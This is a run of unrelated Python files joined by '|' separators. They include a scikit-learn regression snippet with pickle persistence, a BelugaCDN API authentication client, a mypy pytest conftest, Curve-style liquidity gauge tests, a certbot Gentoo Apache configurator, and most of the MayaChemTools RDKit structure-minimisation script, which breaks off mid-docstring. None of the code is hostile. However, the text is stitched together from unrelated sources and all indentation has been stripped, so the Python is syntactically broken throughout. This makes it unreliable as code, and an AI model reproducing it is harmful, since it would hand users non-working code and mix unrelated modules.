print("R2 score =", round(sm.r2_score(y_test, y_test_pred), 2))
# Model persistence
import pickle
output_model_file = "3_model_linear_regr.pkl"
with open(output_model_file, 'wb') as f:
pickle.dump(linear_regressor, f)
with open(output_model_file, 'rb') as f:
model_linregr = pickle.load(f)
y_test_pred_new = model_linregr.predict(X_test)
print("New mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred_new), 2))
ridge_regressor = linear_model.Ridge(alpha=0.01, fit_intercept=True, max_iter=10000)
ridge_regressor.fit(X_train, y_train)
y_test_pred_ridge = ridge_regressor.predict(X_test)
print( "Mean absolute error =", round(sm.mean_absolute_error(y_test, y_test_pred_ridge), 2))
print( "Mean squared error =", round(sm.mean_squared_error(y_test, y_test_pred_ridge), 2))
print( "Median absolute error =", round(sm.median_absolute_error(y_test, y_test_pred_ridge), 2))
print( "Explain variance score =", round(sm.explained_variance_score(y_test, y_test_pred_ridge), 2))
print( "R2 score =", round(sm.r2_score(y_test, y_test_pred_ridge), 2))
|
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import hmac
from requests import Session
from requests.auth import AuthBase
import six
from six.moves.urllib import parse
from . import __version__, repo_url
from .exceptions import InvalidCredentials
class BelugaAPIAuth(AuthBase):
def __init__(self, token_id=None, token_secret=None, username=None,
password=None):
super(BelugaAPIAuth, self).__init__()
if not (token_id and token_secret) and not (username and password):
raise InvalidCredentials('Either token ID + token secret OR '
'username + password is required.')
self.token_id = token_id
self.token_secret = token_secret
self.username = username
self.password = password
def __call__(self, r):
if self.token_id and self.token_secret:
url = parse.urlparse(r.url)
if url.query:
path_qs = '%s?%s' % (url.path, url.query)
else:
path_qs = url.path
date = datetime.datetime.utcnow().isoformat()
parts = [r.method, path_qs, date]
if r.method in ['POST', 'PUT']:
parts.append(hashlib.sha512(r.body).hexdigest())
sign_string = ':'.join(parts)
signed_hmac = hmac.new(self.token_secret.encode(),
sign_string.encode(),
hashlib.sha512).hexdigest()
r.headers.update({
'Authorization': 'Token %s %s' % (self.token_id, signed_hmac),
'Date': date,
})
else:
b64_auth = six.text_type(base64.b64encode(('%s:%s' % (
self.username, self.password)).encode()), 'utf-8')
r.headers['Authorization'] = 'Basic %s' % b64_auth
return r
class BelugaAPI(Session):
def __init__(self, token_id=None, token_secret=None, username=None,
password=None, base_url=None, accept=None):
super(BelugaAPI, self).__init__()
self.base_url = base_url or 'https://api.belugacdn.com'
self.auth = BelugaAPIAuth(token_id, token_secret, username, password)
self.headers = {
'Accept': accept or 'application/json',
'User-Agent': 'beluga_py/%s (+%s)' % (__version__, repo_url)
}
def request(self, method, url, *args, **kwargs):
url_parts = parse.urlparse(url)
if not url_parts.scheme:
url = '/'.join([self.base_url.rstrip('/'), url.lstrip('/')])
return super(BelugaAPI, self).request(method, url, *args, **kwargs)
|
from .throttling import rate_limit
from . import logging
from . import in_inline
|
import os.path
pytest_plugins = [
'mypy.test.data',
]
def pytest_configure(config):
mypy_source_root = os.path.dirname(os.path.abspath(__file__))
if os.getcwd() != mypy_source_root:
os.chdir(mypy_source_root)
# This function name is special to pytest. See
# http://doc.pytest.org/en/latest/writing_plugins.html#initialization-command-line-and-configuration-hooks
def pytest_addoption(parser) -> None:
parser.addoption('--bench', action='store_true', default=False,
help='Enable the benchmark test runs')
|
REWARD = 10 ** 20
WEEK = 7 * 86400
LP_AMOUNT = 10 ** 18
def test_claim_no_deposit(accounts, chain, liquidity_gauge_reward, reward_contract, coin_reward):
# Fund
coin_reward._mint_for_testing(REWARD, {'from': accounts[0]})
coin_reward.transfer(reward_contract, REWARD, {'from': accounts[0]})
reward_contract.notifyRewardAmount(REWARD, {'from': accounts[0]})
chain.sleep(WEEK)
liquidity_gauge_reward.claim_rewards({'from': accounts[1]})
assert coin_reward.balanceOf(accounts[1]) == 0
def test_claim_no_rewards(accounts, chain, liquidity_gauge_reward, mock_lp_token,
reward_contract, coin_reward):
# Deposit
mock_lp_token.transfer(accounts[1], LP_AMOUNT, {'from': accounts[0]})
mock_lp_token.approve(liquidity_gauge_reward, LP_AMOUNT, {'from': accounts[1]})
liquidity_gauge_reward.deposit(LP_AMOUNT, {'from': accounts[1]})
chain.sleep(WEEK)
liquidity_gauge_reward.withdraw(LP_AMOUNT, {'from': accounts[1]})
liquidity_gauge_reward.claim_rewards({'from': accounts[1]})
assert coin_reward.balanceOf(accounts[1]) == 0 |
""" Distribution specific override class for Gentoo Linux """
import pkg_resources
import zope.interface
from certbot import interfaces
from certbot_apache import apache_util
from certbot_apache import configurator
from certbot_apache import parser
@zope.interface.provider(interfaces.IPluginFactory)
class GentooConfigurator(configurator.ApacheConfigurator):
"""Gentoo specific ApacheConfigurator override class"""
OS_DEFAULTS = dict(
server_root="/etc/apache2",
vhost_root="/etc/apache2/vhosts.d",
vhost_files="*.conf",
logs_root="/var/log/apache2",
version_cmd=['/usr/sbin/apache2', '-v'],
apache_cmd="apache2ctl",
restart_cmd=['apache2ctl', 'graceful'],
conftest_cmd=['apache2ctl', 'configtest'],
enmod=None,
dismod=None,
le_vhost_ext="-le-ssl.conf",
handle_mods=False,
handle_sites=False,
challenge_location="/etc/apache2/vhosts.d",
MOD_SSL_CONF_SRC=pkg_resources.resource_filename(
"certbot_apache", "options-ssl-apache.conf")
)
def get_parser(self):
"""Initializes the ApacheParser"""
return GentooParser(
self.aug, self.conf("server-root"), self.conf("vhost-root"),
self.version, configurator=self)
class GentooParser(parser.ApacheParser):
"""Gentoo specific ApacheParser override class"""
def __init__(self, *args, **kwargs):
# Gentoo specific configuration file for Apache2
self.apacheconfig_filep = "/etc/conf.d/apache2"
super(GentooParser, self).__init__(*args, **kwargs)
def update_runtime_variables(self):
""" Override for update_runtime_variables for custom parsing """
self.parse_sysconfig_var()
def parse_sysconfig_var(self):
""" Parses Apache CLI options from Gentoo configuration file """
defines = apache_util.parse_define_file(self.apacheconfig_filep,
"APACHE2_OPTS")
for k in defines.keys():
self.variables[k] = defines[k]
|
#!/bin/env python
#
# File: RDKitPerformMinimization.py
# Author: Manish Sud <msud@san.rr.com>
#
# Copyright (C) 2020 Manish Sud. All rights reserved.
#
# The functionality available in this script is implemented using RDKit, an
# open source toolkit for cheminformatics developed by Greg Landrum.
#
# This file is part of MayaChemTools.
#
# MayaChemTools is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 3 of the License, or (at your option) any
# later version.
#
# MayaChemTools is distributed in the hope that it will be useful, but without
# any warranty; without even the implied warranty of merchantability of fitness
# for a particular purpose. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with MayaChemTools; if not, see <http://www.gnu.org/licenses/> or
# write to the Free Software Foundation Inc., 59 Temple Place, Suite 330,
# Boston, MA, 02111-1307, USA.
#
from __future__ import print_function
# Add local python path to the global path and import standard library modules...
import os
import sys; sys.path.insert(0, os.path.join(os.path.dirname(sys.argv[0]), "..", "lib", "Python"))
import time
import re
import multiprocessing as mp
# RDKit imports...
try:
from rdkit import rdBase
from rdkit import Chem
from rdkit.Chem import AllChem
except ImportError as ErrMsg:
sys.stderr.write("\nFailed to import RDKit module/package: %s\n" % ErrMsg)
sys.stderr.write("Check/update your RDKit environment and try again.\n\n")
sys.exit(1)
# MayaChemTools imports...
try:
from docopt import docopt
import MiscUtil
import RDKitUtil
except ImportError as ErrMsg:
sys.stderr.write("\nFailed to import MayaChemTools module/package: %s\n" % ErrMsg)
sys.stderr.write("Check/update your MayaChemTools environment and try again.\n\n")
sys.exit(1)
ScriptName = os.path.basename(sys.argv[0])
Options = {}
OptionsInfo = {}
def main():
"""Start execution of the script"""
MiscUtil.PrintInfo("\n%s (RDK v%s; %s): Starting...\n" % (ScriptName, rdBase.rdkitVersion, time.asctime()))
(WallClockTime, ProcessorTime) = MiscUtil.GetWallClockAndProcessorTime()
# Retrieve command line arguments and options...
RetrieveOptions()
# Process and validate command line arguments and options...
ProcessOptions()
# Perform actions required by the script...
PerformMinimization()
MiscUtil.PrintInfo("\n%s: Done...\n" % ScriptName)
MiscUtil.PrintInfo("Total time: %s" % MiscUtil.GetFormattedElapsedTime(WallClockTime, ProcessorTime))
def PerformMinimization():
"""Perform minimization."""
# Setup a molecule reader...
MiscUtil.PrintInfo("\nProcessing file %s..." % OptionsInfo["Infile"])
Mols = RDKitUtil.ReadMolecules(OptionsInfo["Infile"], **OptionsInfo["InfileParams"])
# Set up a molecule writer...
Writer = RDKitUtil.MoleculesWriter(OptionsInfo["Outfile"], **OptionsInfo["OutfileParams"])
if Writer is None:
MiscUtil.PrintError("Failed to setup a writer for output fie %s " % OptionsInfo["Outfile"])
MiscUtil.PrintInfo("Generating file %s..." % OptionsInfo["Outfile"])
MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount = ProcessMolecules(Mols, Writer)
if Writer is not None:
Writer.close()
MiscUtil.PrintInfo("\nTotal number of molecules: %d" % MolCount)
MiscUtil.PrintInfo("Number of valid molecules: %d" % ValidMolCount)
MiscUtil.PrintInfo("Number of molecules failed during conformation generation or minimization: %d" % MinimizationFailedCount)
MiscUtil.PrintInfo("Number of molecules failed during writing: %d" % WriteFailedCount)
MiscUtil.PrintInfo("Number of ignored molecules: %d" % (MolCount - ValidMolCount + MinimizationFailedCount + WriteFailedCount))
def ProcessMolecules(Mols, Writer):
"""Process and minimize molecules. """
if OptionsInfo["MPMode"]:
return ProcessMoleculesUsingMultipleProcesses(Mols, Writer)
else:
return ProcessMoleculesUsingSingleProcess(Mols, Writer)
def ProcessMoleculesUsingSingleProcess(Mols, Writer):
"""Process and minimize molecules using a single process."""
if OptionsInfo["SkipConformerGeneration"]:
MiscUtil.PrintInfo("\nPerforming minimization without generation of conformers...")
else:
MiscUtil.PrintInfo("\nPerforming minimization with generation of conformers...")
(MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount) = [0] * 4
for Mol in Mols:
MolCount += 1
if Mol is None:
continue
if RDKitUtil.IsMolEmpty(Mol):
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolCount)
MiscUtil.PrintWarning("Ignoring empty molecule: %s" % MolName)
continue
ValidMolCount += 1
Mol, CalcStatus, ConfID, Energy = MinimizeMoleculeOrConformers(Mol, MolCount)
if not CalcStatus:
MinimizationFailedCount += 1
continue
WriteStatus = WriteMolecule(Writer, Mol, MolCount, ConfID, Energy)
if not WriteStatus:
WriteFailedCount += 1
return (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount)
def ProcessMoleculesUsingMultipleProcesses(Mols, Writer):
"""Process and minimize molecules using multiprocessing."""
if OptionsInfo["SkipConformerGeneration"]:
MiscUtil.PrintInfo("\nPerforming minimization without generation of conformers using multiprocessing...")
else:
MiscUtil.PrintInfo("\nPerforming minimization with generation of conformers using multiprocessing...")
MPParams = OptionsInfo["MPParams"]
# Setup data for initializing a worker process...
InitializeWorkerProcessArgs = (MiscUtil.ObjectToBase64EncodedString(Options), MiscUtil.ObjectToBase64EncodedString(OptionsInfo))
# Setup a encoded mols data iterable for a worker process...
WorkerProcessDataIterable = RDKitUtil.GenerateBase64EncodedMolStrings(Mols)
# Setup process pool along with data initialization for each process...
MiscUtil.PrintInfo("\nConfiguring multiprocessing using %s method..." % ("mp.Pool.imap()" if re.match("^Lazy$", MPParams["InputDataMode"], re.I) else "mp.Pool.map()"))
MiscUtil.PrintInfo("NumProcesses: %s; InputDataMode: %s; ChunkSize: %s\n" % (MPParams["NumProcesses"], MPParams["InputDataMode"], ("automatic" if MPParams["ChunkSize"] is None else MPParams["ChunkSize"])))
ProcessPool = mp.Pool(MPParams["NumProcesses"], InitializeWorkerProcess, InitializeWorkerProcessArgs)
# Start processing...
if re.match("^Lazy$", MPParams["InputDataMode"], re.I):
Results = ProcessPool.imap(WorkerProcess, WorkerProcessDataIterable, MPParams["ChunkSize"])
elif re.match("^InMemory$", MPParams["InputDataMode"], re.I):
Results = ProcessPool.map(WorkerProcess, WorkerProcessDataIterable, MPParams["ChunkSize"])
else:
MiscUtil.PrintError("The value, %s, specified for \"--inputDataMode\" is not supported." % (MPParams["InputDataMode"]))
(MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount) = [0] * 4
for Result in Results:
MolCount += 1
MolIndex, EncodedMol, CalcStatus, ConfID, Energy = Result
if EncodedMol is None:
continue
ValidMolCount += 1
if not CalcStatus:
MinimizationFailedCount += 1
continue
Mol = RDKitUtil.MolFromBase64EncodedMolString(EncodedMol)
WriteStatus = WriteMolecule(Writer, Mol, MolCount, ConfID, Energy)
if not WriteStatus:
WriteFailedCount += 1
return (MolCount, ValidMolCount, MinimizationFailedCount, WriteFailedCount)
def InitializeWorkerProcess(*EncodedArgs):
"""Initialize data for a worker process."""
global Options, OptionsInfo
MiscUtil.PrintInfo("Starting process (PID: %s)..." % os.getpid())
# Decode Options and OptionInfo...
Options = MiscUtil.ObjectFromBase64EncodedString(EncodedArgs[0])
OptionsInfo = MiscUtil.ObjectFromBase64EncodedString(EncodedArgs[1])
def WorkerProcess(EncodedMolInfo):
"""Process data for a worker process."""
MolIndex, EncodedMol = EncodedMolInfo
CalcStatus = False
ConfID = None
Energy = None
if EncodedMol is None:
return [MolIndex, None, CalcStatus, ConfID, Energy]
Mol = RDKitUtil.MolFromBase64EncodedMolString(EncodedMol)
if RDKitUtil.IsMolEmpty(Mol):
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, (MolIndex + 1))
MiscUtil.PrintWarning("Ignoring empty molecule: %s" % MolName)
return [MolIndex, None, CalcStatus, ConfID, Energy]
Mol, CalcStatus, ConfID, Energy = MinimizeMoleculeOrConformers(Mol, (MolIndex + 1))
return [MolIndex, RDKitUtil.MolToBase64EncodedMolString(Mol, PropertyPickleFlags = Chem.PropertyPickleOptions.MolProps | Chem.PropertyPickleOptions.PrivateProps), CalcStatus, ConfID, Energy]
def MinimizeMoleculeOrConformers(Mol, MolNum = None):
"""Minimize molecule or conformers."""
ConfID = None
if OptionsInfo["SkipConformerGeneration"]:
Mol, CalcStatus, Energy = MinimizeMolecule(Mol, MolNum)
else:
Mol, CalcStatus, ConfID, Energy = MinimizeConformers(Mol, MolNum)
return (Mol, CalcStatus, ConfID, Energy)
def MinimizeMolecule(Mol, MolNum = None):
"Minimize molecule."
if OptionsInfo["AddHydrogens"]:
Mol = Chem.AddHs(Mol, addCoords = True)
Status = 0
try:
if OptionsInfo["UseUFF"]:
Status = AllChem.UFFOptimizeMolecule(Mol, maxIters = OptionsInfo["MaxIters"])
elif OptionsInfo["UseMMFF"]:
Status = AllChem.MMFFOptimizeMolecule(Mol, maxIters = OptionsInfo["MaxIters"], mmffVariant = OptionsInfo["MMFFVariant"])
else:
MiscUtil.PrintError("Minimization couldn't be performed: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
except (ValueError, RuntimeError, Chem.rdchem.KekulizeException) as ErrMsg:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s:\n%s\n" % (MolName, ErrMsg))
return (Mol, False, None)
if Status != 0:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Minimization failed to converge for molecule %s in %d steps. Try using higher value for \"--maxIters\" option...\n" % (MolName, OptionsInfo["MaxIters"]))
Energy = None
if OptionsInfo["EnergyOut"]:
EnergyStatus, Energy = GetEnergy(Mol)
if EnergyStatus:
Energy = "%.2f" % Energy
else:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Failed to retrieve calculated energy for molecule %s. Try again after removing any salts or cleaing up the molecule...\n" % (MolName))
if OptionsInfo["RemoveHydrogens"]:
Mol = Chem.RemoveHs(Mol)
return (Mol, True, Energy)
def MinimizeConformers(Mol, MolNum = None):
"Generate and minimize conformers for a molecule to get the lowest energy conformer."
if OptionsInfo["AddHydrogens"]:
Mol = Chem.AddHs(Mol)
ConfIDs = EmbedMolecule(Mol, MolNum)
if not len(ConfIDs):
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s: Embedding failed...\n" % MolName)
return (Mol, False, None, None)
CalcEnergyMap = {}
for ConfID in ConfIDs:
try:
if OptionsInfo["UseUFF"]:
Status = AllChem.UFFOptimizeMolecule(Mol, confId = ConfID, maxIters = OptionsInfo["MaxIters"])
elif OptionsInfo["UseMMFF"]:
Status = AllChem.MMFFOptimizeMolecule(Mol, confId = ConfID, maxIters = OptionsInfo["MaxIters"], mmffVariant = OptionsInfo["MMFFVariant"])
else:
MiscUtil.PrintError("Minimization couldn't be performed: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
except (ValueError, RuntimeError, Chem.rdchem.KekulizeException) as ErrMsg:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Minimization couldn't be performed for molecule %s:\n%s\n" % (MolName, ErrMsg))
return (Mol, False, None, None)
EnergyStatus, Energy = GetEnergy(Mol, ConfID)
if not EnergyStatus:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Failed to retrieve calculated energy for conformation number %d of molecule %s. Try again after removing any salts or cleaing up the molecule...\n" % (ConfID, MolName))
return (Mol, False, None, None)
if Status != 0:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Minimization failed to converge for conformation number %d of molecule %s in %d steps. Try using higher value for \"--maxIters\" option...\n" % (ConfID, MolName, OptionsInfo["MaxIters"]))
CalcEnergyMap[ConfID] = Energy
SortedConfIDs = sorted(ConfIDs, key = lambda ConfID: CalcEnergyMap[ConfID])
MinEnergyConfID = SortedConfIDs[0]
if OptionsInfo["RemoveHydrogens"]:
Mol = Chem.RemoveHs(Mol)
Energy = "%.2f" % CalcEnergyMap[MinEnergyConfID] if OptionsInfo["EnergyOut"] else None
return (Mol, True, MinEnergyConfID, Energy)
def GetEnergy(Mol, ConfID = None):
"Calculate energy."
Status = True
Energy = None
if ConfID is None:
ConfID = -1
if OptionsInfo["UseUFF"]:
UFFMoleculeForcefield = AllChem.UFFGetMoleculeForceField(Mol, confId = ConfID)
if UFFMoleculeForcefield is None:
Status = False
else:
Energy = UFFMoleculeForcefield.CalcEnergy()
elif OptionsInfo["UseMMFF"]:
MMFFMoleculeProperties = AllChem.MMFFGetMoleculeProperties(Mol, mmffVariant = OptionsInfo["MMFFVariant"])
MMFFMoleculeForcefield = AllChem.MMFFGetMoleculeForceField(Mol, MMFFMoleculeProperties, confId = ConfID)
if MMFFMoleculeForcefield is None:
Status = False
else:
Energy = MMFFMoleculeForcefield.CalcEnergy()
else:
MiscUtil.PrintError("Couldn't retrieve conformer energy: Specified forcefield, %s, is not supported" % OptionsInfo["ForceField"])
return (Status, Energy)
def EmbedMolecule(Mol, MolNum = None):
"Embed conformations"
ConfIDs = []
MaxConfs = OptionsInfo["MaxConfs"]
RandomSeed = OptionsInfo["RandomSeed"]
EnforceChirality = OptionsInfo["EnforceChirality"]
UseExpTorsionAnglePrefs = OptionsInfo["UseExpTorsionAnglePrefs"]
UseBasicKnowledge = OptionsInfo["UseBasicKnowledge"]
try:
ConfIDs = AllChem.EmbedMultipleConfs(Mol, numConfs = MaxConfs, randomSeed = RandomSeed, enforceChirality = EnforceChirality, useExpTorsionAnglePrefs = UseExpTorsionAnglePrefs, useBasicKnowledge = UseBasicKnowledge)
except ValueError as ErrMsg:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Embedding failed for molecule %s:\n%s\n" % (MolName, ErrMsg))
ConfIDs = []
return ConfIDs
def WriteMolecule(Writer, Mol, MolNum = None, ConfID = None, Energy = None):
"""Write molecule. """
if Energy is not None:
Mol.SetProp(OptionsInfo["EnergyLabel"], Energy)
try:
if ConfID is None:
Writer.write(Mol)
else:
Writer.write(Mol, confId = ConfID)
except (ValueError, RuntimeError) as ErrMsg:
if not OptionsInfo["QuietMode"]:
MolName = RDKitUtil.GetMolName(Mol, MolNum)
MiscUtil.PrintWarning("Failed to write molecule %s:\n%s\n" % (MolName, ErrMsg))
return False
return True
def ProcessOptions():
"""Process and validate command line arguments and options"""
MiscUtil.PrintInfo("Processing options...")
# Validate options...
ValidateOptions()
OptionsInfo["Infile"] = Options["--infile"]
OptionsInfo["InfileParams"] = MiscUtil.ProcessOptionInfileParameters("--infileParams", Options["--infileParams"], Options["--infile"])
OptionsInfo["Outfile"] = Options["--outfile"]
OptionsInfo["OutfileParams"] = MiscUtil.ProcessOptionOutfileParameters("--outfileParams", Options["--outfileParams"])
OptionsInfo["Overwrite"] = Options["--overwrite"]
OptionsInfo["AddHydrogens"] = True if re.match("^yes$", Options["--addHydrogens"], re.I) else False
if re.match("^ETDG$", Options["--conformerGenerator"], re.I):
ConformerGenerator = "ETDG"
UseExpTorsionAnglePrefs = True
UseBasicKnowledge = False
SkipConformerGeneration = False
elif re.match("^KDG$", Options["--conformerGenerator"], re.I):
ConformerGenerator = "KDG"
UseExpTorsionAnglePrefs = False
UseBasicKnowledge = True
SkipConformerGeneration = False
elif re.match("^ETKDG$", Options["--conformerGenerator"], re.I):
ConformerGenerator = "ETKDG"
UseExpTorsionAnglePrefs = True
UseBasicKnowledge = True
SkipConformerGeneration = False
elif re.match("^SDG$", Options["--conformerGenerator"], re.I):
ConformerGenerator = "SDG"
UseExpTorsionAnglePrefs = False
UseBasicKnowledge = False
SkipConformerGeneration = False
else:
ConformerGenerator = "None"
UseExpTorsionAnglePrefs = False
UseBasicKnowledge = False
SkipConformerGeneration = True
OptionsInfo["SkipConformerGeneration"] = SkipConformerGeneration
OptionsInfo["ConformerGenerator"] = ConformerGenerator
OptionsInfo["UseExpTorsionAnglePrefs"] = UseExpTorsionAnglePrefs
OptionsInfo["UseBasicKnowledge"] = UseBasicKnowledge
if re.match("^UFF$", Options["--forceField"], re.I):
ForceField = "UFF"
UseUFF = True
UseMMFF = False
elif re.match("^MMFF$", Options["--forceField"], re.I):
ForceField = "MMFF"
UseUFF = False
UseMMFF = True
else:
MiscUtil.PrintError("The value, %s, specified for \"--forceField\" is not supported." % (Options["--forceField"],))
MMFFVariant = "MMFF94" if re.match("^MMFF94$", Options["--forceFieldMMFFVariant"], re.I) else "MMFF94s"
OptionsInfo["ForceField"] = ForceField
OptionsInfo["MMFFVariant"] = MMFFVariant
OptionsInfo["UseMMFF"] = UseMMFF
OptionsInfo["UseUFF"] = UseUFF
OptionsInfo["EnergyOut"] = True if re.match("^yes$", Options["--energyOut"], re.I) else False
if UseMMFF:
OptionsInfo["EnergyLabel"] = "%s_Energy" % MMFFVariant
else:
OptionsInfo["EnergyLabel"] = "%s_Energy" % ForceField
OptionsInfo["EnforceChirality"] = True if re.match("^yes$", Options["--enforceChirality"], re.I) else False
OptionsInfo["MaxIters"] = int(Options["--maxIters"])
OptionsInfo["MaxConfs"] = int(Options["--maxConfs"])
OptionsInfo["MPMode"] = True if re.match("^yes$", Options["--mp"], re.I) else False
OptionsInfo["MPParams"] = MiscUtil.ProcessOptionMultiprocessingParameters("--mpParams", Options["--mpParams"])
OptionsInfo["QuietMode"] = True if re.match("^yes$", Options["--quiet"], re.I) else False
RandomSeed = -1
if not re.match("^auto$", Options["--randomSeed"], re.I):
RandomSeed = int(Options["--randomSeed"])
OptionsInfo["RandomSeed"] = RandomSeed
OptionsInfo["RemoveHydrogens"] = True if re.match("^yes$", Options["--removeHydrogens"], re.I) else False
def RetrieveOptions():
"""Retrieve command line arguments and options"""
# Get options...
global Options
Options = docopt(_docoptUsage_)
# Set current working directory to the specified directory...
WorkingDir = Options["--workingdir"]
if WorkingDir:
os.chdir(WorkingDir)
# Handle examples option...
if "--examples" in Options and Options["--examples"]:
MiscUtil.PrintInfo(MiscUtil.GetExamplesTextFromDocOptText(_docoptUsage_))
sys.exit(0)
def ValidateOptions():
"""Validate option values"""
MiscUtil.ValidateOptionTextValue("-a, --addHydrogens", Options["--addHydrogens"], "yes no")
MiscUtil.ValidateOptionTextValue("-c, --conformerGenerator", Options["--conformerGenerator"], "SDG ETDG KDG ETKDG None")
MiscUtil.ValidateOptionTextValue("-f, --forceField", Options["--forceField"], "UFF MMFF")
MiscUtil.ValidateOptionTextValue(" --forceFieldMMFFVariant", Options["--forceFieldMMFFVariant"], "MMFF94 MMFF94s")
MiscUtil.ValidateOptionTextValue("--energyOut", Options["--energyOut"], "yes no")
MiscUtil.ValidateOptionTextValue("--enforceChirality ", Options["--enforceChirality"], "yes no")
MiscUtil.ValidateOptionFilePath("-i, --infile", Options["--infile"])
MiscUtil.ValidateOptionFileExt("-i, --infile", Options["--infile"], "sdf sd mol smi txt csv tsv")
MiscUtil.ValidateOptionFileExt("-o, --outfile", Options["--outfile"], "sdf sd")
MiscUtil.ValidateOptionsOutputFileOverwrite("-o, --outfile", Options["--outfile"], "--overwrite", Options["--overwrite"])
MiscUtil.ValidateOptionsDistinctFileNames("-i, --infile", Options["--infile"], "-o, --outfile", Options["--outfile"])
MiscUtil.ValidateOptionIntegerValue("--maxConfs", Options["--maxConfs"], {">": 0})
MiscUtil.ValidateOptionIntegerValue("--maxIters", Options["--maxIters"], {">": 0})
MiscUtil.ValidateOptionTextValue("--mp", Options["--mp"], "yes no")
MiscUtil.ValidateOptionTextValue("-q, --quiet", Options["--quiet"], "yes no")
if not re.match("^auto$", Options["--randomSeed"], re.I):
MiscUtil.ValidateOptionIntegerValue("--randomSeed", Options["--randomSeed"], {})
MiscUtil.ValidateOptionTextValue("-r, --removeHydrogens", Options["--removeHydrogens"], "yes no")
# Setup a usage string for docopt...
_docoptUsage_ = """
RDKitPerformMinimization.py - Perform structure minimization
Usage:
RDKitPerformMinimization.py [--addHydrogens <yes or no>] [--conformerGenerator <SDG, ETDG, KDG, ETKDG, None>]
[--forceField <UFF, or MMFF>] [--forceFieldMMFFVariant <MMFF94 or MMFF94s>]
[--energyOut <yes or no>] [--enforceChirality <yes or no>] [--infileParams <Name,Value,...>]
[--maxConfs <number>] [--maxIters <number>] [--mp <yes or no>] [--mpParams <Name.Value,...>]
[ --outfileParams <Name,Value,...> ] [--overwrite] [--quiet <yes or no>] [ --removeHydrogens <yes or no>]
[--randomSeed <number>] [-w <dir>] -i <infile> -o <outfile>
RDKitPerformMinimization.py -h | --help | -e | --examples
Description:
Generate 3D structures for molecules using a combination of distance geometry
and forcefield minimization or minimize existing 3D structures using a specified
forcefield.
The supported input file formats are: Mol (.mol), SD (.sdf, .sd), SMILES (.smi)
.csv, .tcsv .txt)
The supported output file formats are: SD (.sdf, .sd)
Options:
-a, --addHydrogens <yes or no> [default: yes]
Add hydrogens before minimization.
-c, --conformerGenerator <SDG, ETDG, KDG, ETKDG, None> [default: ETKDG]
Conformation generation methodology for generating initial 3D coordinates.
Possible values: Standard Distance Geometry, (SDG), Experimental Torsion-angle
preference with Distance Geometry (ETDG), basic Knowledge-terms with Distance
Geometry (KDG), and Experimental Torsion-angle preference along with basic
Knowledge-terms with Distance Geometry (ETKDG) [Ref 129] .
The conformation generation step may be skipped by specifying 'None' value to
perform only forcefield minimization of molecules with 3D structures in input
file. This doesn't work for molecules in SMILES file or molecules in SD/MOL files
containing 2D structures.
-f, --forceField <UFF, MMFF> [default: MMFF]
Forcefield method to use for energy minimization. Possible values: Universal Force
Field (UFF) [ Ref 81 ] or Merck Molecular Mechanics Force Field [ Ref 83-87 ] .
--forceFieldMMFFVariant <MMFF94 or MMFF94s> [default: MMFF94]
Variant of MMFF forcefield to use for energy minimization.
--energyOut <yes or no> [default: No]
Write out energy values.
--enforceChirality <yes or no> [default: Yes]
Enforce chirality for defined chiral centers.
-e, --examples
Print examples.
-h, --help
Print this help message.
-i, --infile <infile>
Input file name.
--infileParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs for reading
molecules from files. The supported parameter names for different file
formats, along with their default values, are shown below:
SD, MOL: removeHydrogens,yes,sanitize,yes,strictParsing,yes
SMILES: smilesColumn,1,smilesNameColumn,2,smilesDelimiter,space,
smilesTitleLine,auto,sanitize,yes
Possible values for smilesDelimiter: space, comma or tab.
--maxConfs <number> [default: 250]
Maximum number of conformations to generate for each molecule by conformation
generation methodology for initial 3D coordinates. The conformations are minimized
using the specified forcefield and the lowest energy conformation is written to the
output file. This option is ignored during 'None' value of '-c --conformerGenerator'
option.
--maxIters <number> [default: 500]
Maximum number of iterations to perform for each molecule during forcefield
minimization.
--mp <yes or no> [default: no]
Use multiprocessing.
By default, input data is retrieved in a lazy manner via mp.Pool.imap()
function employing lazy RDKit data iterable. This allows processing of
arbitrary large data sets without any additional requirements memory.
All input data may be optionally loaded into memory by mp.Pool.map()
before starting worker processes in a process pool by setting the value
of 'inputDataMode' to 'InMemory' in '--mpParams' option.
A word to the wise: The default 'chunkSize' value of 1 during 'Lazy' input
data mode may adversely impact the performance. The '--mpParams' section
provides additional information to tune the value of 'chunkSize'.
--mpParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs for to
configure multiprocessing.
The supported parameter names along with their default and possible
values are shown below:
chunkSize, auto
inputDataMode, Lazy [ Possible values: InMemory or Lazy ]
numProcesses, auto [ Default: mp.cpu_count() ]
These parameters are used by the following functions to configure and
control the behavior of multiprocessing: mp.Pool(), mp.Pool.map(), and
mp.Pool.imap().
The chunkSize determines chunks of input data passed to each worker
process in a process pool by mp.Pool.map() and mp.Pool.imap() functions.
